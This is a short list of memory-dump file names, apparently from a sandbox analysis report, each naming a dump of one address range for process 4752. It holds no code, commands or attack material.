memory/4752-102-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-103-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-104-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-105-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-106-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-107-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-108-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-109-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-110-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-111-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-112-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-113-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-114-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-115-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-116-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-117-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-118-0x00007FF643870000-0x00007FF6444A3000-memory.dmp